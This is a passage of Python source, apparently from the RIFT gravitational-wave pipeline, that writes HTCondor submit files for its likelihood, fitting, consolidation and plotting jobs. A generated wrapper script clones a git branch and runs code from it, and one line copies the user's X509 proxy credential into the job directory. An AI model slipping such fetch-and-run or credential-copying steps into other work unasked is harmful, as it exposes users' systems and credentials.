ile_job.add_opt("fname", input_net)
ile_job.add_opt("fname-output-samples", out_dir+"/"+output)
ile_job.add_opt("fname-output-integral", out_dir+"/"+output)
#
# Macro based options.
# - select EOS from list (done via macro)
# - pass spectral parameters
#
# ile_job.add_var_opt("event")
if use_eos:
ile_job.add_var_opt("using-eos")
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "fname_output_samples" in kwargs and kwargs["fname_output_samples"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["fname_output_samples"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
if "fname_output_integral" in kwargs and kwargs["fname_output_integral"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["fname_output_integral"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
ile_job.add_condor_cmd("stream_error",'True')
ile_job.add_condor_cmd("stream_output",'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory, with a 50% increased memory request each time.
return ile_job, ile_sub_name
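# ---------------------------------------------------------------------------
# Illustrative sketch (not exercised anywhere in this module): a single CIP
# node.  The arg_str contents (parameters, fit method, ranges) are hypothetical
# placeholders; in the real workflow they are assembled by the top-level
# pipeline driver and passed through verbatim.
# ---------------------------------------------------------------------------
def _example_cip_node(dag, log_dir="logs/", out_dir="."):
    """Minimal sketch; the CIP options below are illustrative only."""
    cip_arg_str = "--parameter mc --parameter delta_mc --mc-range [10,20] --fit-method gp"
    cip_job, _ = write_CIP_sub(tag='CIP', input_net='all.net',
                               output='output-ILE-samples',
                               out_dir=out_dir, log_dir=log_dir,
                               arg_str=cip_arg_str, request_memory=8192)
    node = pipeline.CondorDAGNode(cip_job)
    node.add_macro("macroevent", 0)   # only used to label the log files
    dag.add_node(node)
    return node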
def write_puff_sub(tag='puffball', exe=None, input_net='output-ILE-samples',output='puffball',universe="vanilla",out_dir=None,log_dir=None, use_eos=False,ncopies=1,arg_str=None,request_memory=1024,arg_vals=None, no_grid=False,**kwargs):
"""
Write a submit file for the 'puffball' job, which broadens the current set of intrinsic sample points (util_ParameterPuffball.py).
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for the puffball job
"""
exe = exe or which("util_ParameterPuffball.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt("inj-file", input_net)
ile_job.add_opt("inj-file-out", output)
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_ILE_sub_simple(tag='integrate', exe=None, log_dir=None, use_eos=False,simple_unique=False,ncopies=1,arg_str=None,request_memory=4096,request_gpu=False,request_disk=False,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,use_simple_osg_requirements=False,singularity_image=None,use_cvmfs_frames=False,frames_dir=None,cache_file=None,fragile_hold=False,max_runtime_minutes=None,condor_commands=None,**kwargs):
"""
Write a submit file for launching ILE jobs, which marginalize the likelihood over extrinsic parameters at fixed intrinsic points.
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
if use_singularity and (singularity_image == None) :
print(" FAIL : Need to specify singularity_image to use singularity ")
sys.exit(0)
if use_singularity and (frames_dir == None) and (cache_file == None) :
print(" FAIL : Need to specify frames_dir or cache_file to use singularity (at present) ")
sys.exit(0)
if use_singularity and (transfer_files == None) :
print(" FAIL : Need to specify transfer_files to use singularity at present! (we will append the prescript; you should transfer any PSDs as well as the grid file ")
sys.exit(0)
exe = exe or which("integrate_likelihood_extrinsic")
frames_local = None
if use_singularity:
path_split = exe.split("/")
print(" Executable: name breakdown ", path_split, " from ", exe)
singularity_base_exe_path = "/opt/lscsoft/rift/MonteCarloMarginalizeCode/Code/" # should not hardcode this ...!
if 'SINGULARITY_BASE_EXE_DIR' in list(os.environ.keys()) :
singularity_base_exe_path = os.environ['SINGULARITY_BASE_EXE_DIR']
else:
# singularity_base_exe_path = "/opt/lscsoft/rift/MonteCarloMarginalizeCode/Code/" # should not hardcode this ...!
singularity_base_exe_path = "/usr/bin/" # should not hardcode this ...!
exe=singularity_base_exe_path + path_split[-1]
if not(frames_dir is None):
frames_local = frames_dir.split("/")[-1]
elif use_osg: # NOT using singularity!
if not(frames_dir is None):
frames_local = frames_dir.split("/")[-1]
path_split = exe.split("/")
exe=path_split[-1] # pull out basename
exe_here = 'my_wrapper.sh'
if transfer_files is None:
transfer_files = []
transfer_files += ['../my_wrapper.sh']
with open(exe_here,'w') as f:
f.write("#! /bin/bash \n")
f.write(r"""
#!/bin/bash
# Modules and scripts run directly from repository
# Note the repo and branch are self-referential ! Not a robust solution long-term
# Exit on failure:
# set -e
export INSTALL_DIR=research-projects-RIT
export ILE_DIR=${INSTALL_DIR}/MonteCarloMarginalizeCode/Code
export PATH=${PATH}:${ILE_DIR}
export PYTHONPATH=${PYTHONPATH}:${ILE_DIR}
export GW_SURROGATE=gwsurrogate
git clone https://git.ligo.org/richard-oshaughnessy/research-projects-RIT.git
pushd ${INSTALL_DIR}
git checkout temp-RIT-Tides-port_master-GPUIntegration
popd
ls
cat local.cache
echo Starting ...
./research-projects-RIT/MonteCarloMarginalizeCode/Code/""" + exe + " $@ \n")
os.system("chmod a+x "+exe_here)
exe = exe_here # update executable
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
#
# Macro based options.
# - select EOS from list (done via macro)
# - pass spectral parameters
#
# ile_job.add_var_opt("event")
if use_eos:
ile_job.add_var_opt("using-eos")
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
if simple_unique:
uniq_str = "$(macroevent)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
if cache_file:
ile_job.add_opt("cache-file",cache_file)
ile_job.add_var_opt("event")
if not use_osg:
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
if not(request_disk is False):
ile_job.add_condor_cmd('request_disk', str(request_disk))
nGPUs =0
if request_gpu:
nGPUs=1
ile_job.add_condor_cmd('request_GPUs', str(nGPUs))
if use_singularity:
# Compare to https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('request_CPUs', str(1))
ile_job.add_condor_cmd('transfer_executable', 'False')
ile_job.add_condor_cmd("+SingularityBindCVMFS", 'True')
ile_job.add_condor_cmd("+SingularityImage", '"' + singularity_image + '"')
requirements = []
requirements.append("HAS_SINGULARITY=?=TRUE")
# if not(use_simple_osg_requirements):
# requirements.append("HAS_CVMFS_LIGO_CONTAINERS=?=TRUE")
#ile_job.add_condor_cmd("requirements", ' (IS_GLIDEIN=?=True) && (HAS_LIGO_FRAMES=?=True) && (HAS_SINGULARITY=?=TRUE) && (HAS_CVMFS_LIGO_CONTAINERS=?=TRUE)')
if use_cvmfs_frames:
requirements.append("HAS_LIGO_FRAMES=?=TRUE")
ile_job.add_condor_cmd('use_x509userproxy','True')
if 'X509_USER_PROXY' in list(os.environ.keys()):
print(" Storing copy of X509 user proxy -- beware expiration! ")
cwd = os.getcwd()
fname_proxy = cwd +"/my_proxy" # this can get overwritten, that's fine - just renews, feature not bug
os.system("cp ${X509_USER_PROXY} " + fname_proxy)
# ile_job.add_condor_cmd('x509userproxy',os.environ['X509_USER_PROXY'])
ile_job.add_condor_cmd('x509userproxy',fname_proxy)
if use_osg:
if not(use_simple_osg_requirements):
requirements.append("IS_GLIDEIN=?=TRUE")
# avoid black-holing jobs to specific machines that consistently fail. Uses history attribute for ad
ile_job.add_condor_cmd('periodic_release','(HoldReasonCode == 45) && (HoldReasonSubCode == 0)')
ile_job.add_condor_cmd('job_machine_attrs','Machine')
ile_job.add_condor_cmd('job_machine_attrs_history_length','4')
# for indx in [1,2,3,4]:
# requirements.append("TARGET.GLIDEIN_ResourceName=!=MY.MachineAttrGLIDEIN_ResourceName{}".format(indx))
if "OSG_DESIRED_SITES" in os.environ:
ile_job.add_condor_cmd('+DESIRED_SITES',os.environ["OSG_DESIRED_SITES"])
if "OSG_UNDESIRED_SITES" in os.environ:
ile_job.add_condor_cmd('+UNDESIRED_SITES',os.environ["OSG_UNDESIRED_SITES"])
# Some options to automate restarts, acts on top of RETRY in dag
if fragile_hold:
ile_job.add_condor_cmd("periodic_release","(NumJobStarts < 5) && ((CurrentTime - EnteredCurrentStatus) > 600)")
ile_job.add_condor_cmd("on_exit_hold","(ExitBySignal == True) || (ExitCode != 0)")
if use_singularity or use_osg:
# Set up file transfer options
ile_job.add_condor_cmd("when_to_transfer_output",'ON_EXIT')
# Stream log info
ile_job.add_condor_cmd("stream_error",'True')
ile_job.add_condor_cmd("stream_output",'True')
# Create prescript command to set up local.cache, only if frames are needed
# if we have CVMFS frames, we should be copying local.cache over directly, with it already populated !
if not(frames_local is None) and not(use_cvmfs_frames): # should be required for singularity or osg
try:
lalapps_path2cache=os.environ['LALAPPS_PATH2CACHE']
except KeyError:
print("Variable LALAPPS_PATH2CACHE is unset, assume default lalapps_path2cache is appropriate")
lalapps_path2cache="lalapps_path2cache"
cmdname = 'ile_pre.sh'
if transfer_files is None:
transfer_files = []
transfer_files += ["../ile_pre.sh", frames_dir] # assuming default working directory setup
with open(cmdname,'w') as f:
f.write("#! /bin/bash -xe \n")
f.write( "ls "+frames_local+" | {lalapps_path2cache} 1> local.cache \n".format(lalapps_path2cache=lalapps_path2cache)) # Danger: need user to correctly specify local.cache directory
# Rewrite cache file to use relative paths, not a file:// operation
f.write(" cat local.cache | awk '{print $1, $2, $3, $4}' > local_stripped.cache \n")
f.write("for i in `ls " + frames_local + "`; do echo "+ frames_local + "/$i; done > base_paths.dat \n")
f.write("paste local_stripped.cache base_paths.dat > local_relative.cache \n")
f.write("cp local_relative.cache local.cache \n")
os.system("chmod a+x ile_pre.sh")
ile_job.add_condor_cmd('+PreCmd', '"ile_pre.sh"')
# if use_osg:
# ile_job.add_condor_cmd("+OpenScienceGrid",'True')
if use_cvmfs_frames:
transfer_files += ["../local.cache"]
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
if not transfer_files is None:
if not isinstance(transfer_files, list):
fname_str=transfer_files
else:
fname_str = ','.join(transfer_files)
fname_str=fname_str.strip()
ile_job.add_condor_cmd('transfer_input_files', fname_str)
ile_job.add_condor_cmd('should_transfer_files','YES')
if not transfer_output_files is None:
if not isinstance(transfer_output_files, list):
fname_str=transfer_output_files
else:
fname_str = ','.join(transfer_output_files)
fname_str=fname_str.strip()
ile_job.add_condor_cmd('transfer_output_files', fname_str)
# Periodic remove: kill jobs running longer than max runtime
# https://stackoverflow.com/questions/5900400/maximum-run-time-in-condor
if not(max_runtime_minutes is None):
remove_str = 'JobStatus =?= 2 && (CurrentTime - JobStartDate) > ( {})'.format(60*max_runtime_minutes)
ile_job.add_condor_cmd('periodic_remove', remove_str)
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory, with a 50% increased memory request each time.
if condor_commands is not None:
for cmd, value in condor_commands.items():
ile_job.add_condor_cmd(cmd, value)
return ile_job, ile_sub_name
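# ---------------------------------------------------------------------------
# Illustrative sketch (not exercised anywhere in this module): the usual ILE
# worker job, one node per intrinsic point ('event') of the current grid, run
# without OSG or singularity.  The arg_str and file names are hypothetical
# placeholders.
# ---------------------------------------------------------------------------
def _example_ile_simple_dag(n_events=10, log_dir="logs/"):
    """Minimal sketch, assuming glue.pipeline var-opt macro semantics."""
    ile_arg_str = ("--sim-xml overlap-grid.xml.gz --channel-name H1=GDS-CALIB_STRAIN "
                   "--psd-file H1=H1-psd.xml.gz --n-max 2000000 --save-samples")
    dag = pipeline.CondorDAG(log_dir + "ile.dag.log")
    dag.set_dag_file("marginalize_extrinsic_parameters")
    ile_job, _ = write_ILE_sub_simple(tag='ILE', log_dir=log_dir,
                                      cache_file="local.cache",
                                      arg_str=ile_arg_str,
                                      request_memory=4096,
                                      ncopies=2)       # two identical workers per point
    for event_id in range(n_events):
        node = pipeline.CondorDAGNode(ile_job)
        node.add_var_opt("event", event_id)            # sets $(macroevent): log names and --event
        dag.add_node(node)
    dag.write_sub_files()
    dag.write_dag()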
def write_consolidate_sub_simple(tag='consolidate', exe=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1,no_grid=False, **kwargs):
"""
Write a submit file for launching a consolidation job
util_ILEdagPostprocess.sh # suitable for ILE consolidation.
arg_str # add argument (used for NR postprocessing, to identify group)
"""
exe = exe or which("util_ILEdagPostprocess.sh")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# Add manual options for input, output
ile_job.add_arg(base) # what directory to load
ile_job.add_arg(target) # where to put the output (label), in CWD
#
# NO OPTIONS
#
# arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
# arg_str = arg_str.lstrip('-')
# ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory, with a 50% increased memory request each time.
return ile_job, ile_sub_name
def write_unify_sub_simple(tag='unify', exe=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1,no_grid=False, **kwargs):
"""
Write a submit file for launching a 'unify' job: concatenate and de-duplicate the
*.composite files produced by ILE, via util_CleanILE.py (wrapped in a generated unify.sh)
"""
exe = exe or which("util_CleanILE.py") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
# Write unify.sh
# - problem of globbing inside condor commands
# - problem that *.composite files from intermediate results will generally NOT be present
cmdname ='unify.sh'
base_str = ''
if not (base is None):
base_str = ' ' + base +"/"
with open(cmdname,'w') as f:
f.write("#! /usr/bin/env bash\n")
f.write( "ls " + base_str+"*.composite 1>&2 \n") # write filenames being concatenated to stderr
f.write( exe + base_str+ "*.composite \n")
st = os.stat(cmdname)
import stat
os.chmod(cmdname, st.st_mode | stat.S_IEXEC)
ile_job = pipeline.CondorDAGJob(universe=universe, executable=base_str+cmdname) # force full prefix
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# Add manual options for input, output
# ile_job.add_arg('*.composite') # what to do
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_convert_sub(tag='convert', exe=None, file_input=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'convert' job
convert_output_format_ile2inference
"""
exe = exe or which("convert_output_format_ile2inference")  # converts the unified composite output into an inference-style posterior-samples file
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
if not(arg_str is None or len(arg_str)<2):
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_arg(file_input)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(file_output)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
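# ---------------------------------------------------------------------------
# Illustrative sketch (not exercised anywhere in this module): the usual
# post-ILE chain, consolidate -> unify -> convert, expressed as dependent DAG
# nodes.  Directory and file names below are hypothetical placeholders.
# ---------------------------------------------------------------------------
def _example_postprocess_chain(dag, ile_nodes, log_dir="logs/"):
    """Minimal sketch, assuming glue.pipeline parent/child semantics."""
    con_job, _ = write_consolidate_sub_simple(tag='consolidate', log_dir=log_dir,
                                              base="iteration_0_ile", target="consolidated_0")
    uni_job, _ = write_unify_sub_simple(tag='unify', log_dir=log_dir, target="all.net")
    cvt_job, _ = write_convert_sub(tag='convert', log_dir=log_dir,
                                   file_input="all.net",
                                   file_output="posterior_samples.dat")
    con_node = pipeline.CondorDAGNode(con_job)
    uni_node = pipeline.CondorDAGNode(uni_job)
    cvt_node = pipeline.CondorDAGNode(cvt_job)
    for parent in ile_nodes:
        con_node.add_parent(parent)
    uni_node.add_parent(con_node)       # unify reads the *.composite files written above
    cvt_node.add_parent(uni_node)       # convert reads the unified all.net
    for node in (con_node, uni_node, cvt_node):
        node.add_macro("macromassid", 0)   # only used to label the log files
        dag.add_node(node)
    return cvt_node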
def write_test_sub(tag='converge', exe=None,samples_files=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a convergence test job
"""
exe = exe or which("convergence_test_samples.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Add options for two parameter files
for name in samples_files:
# ile_job.add_opt("samples",name) # do not add in usual fashion, because otherwise the key's value is overwritten
ile_job.add_opt("samples " + name,'')
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_plot_sub(tag='converge', exe=None,samples_files=None, base=None,target=None,arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a final plot. Note the user can in principle specify several samples (e.g., several iterations, if we want to diagnose them)
"""
exe = exe or which("plot_posterior_corner.py")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
    ile_job.add_opt(arg_str,'') # add_opt() writes its own leading '--', so the already-stripped option string is passed as the key with an empty value
    # ile_job.add_opt(arg_str[2:],'') # equivalent variant that strips the leading '--' by hand
# Add options for two parameter files
for name in samples_files:
# ile_job.add_opt("samples",name) # do not add in usual fashion, because otherwise the key's value is overwritten
ile_job.add_opt("posterior-file " + name,'')
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
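# The loop above folds each file name into the option key ("posterior-file <name>")
# because, as the in-line comment notes, adding the same key twice would overwrite
# the earlier value; the folded form still ends up as "--posterior-file <name>" on
# the command line.  A minimal usage sketch (file names, parameters and log
# directory are placeholders):
def _sketch_corner_plot_job():
    """Sketch: one corner-plot job fed several posterior files."""
    return write_plot_sub(tag='plot_corner',
                          samples_files=['posterior_samples-1.dat',
                                         'posterior_samples-2.dat'],
                          target='corner_plot.out',
                          arg_str='--parameter mc --parameter q',
                          log_dir='logs/')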
def write_init_sub(tag='gridinit', exe=None,arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
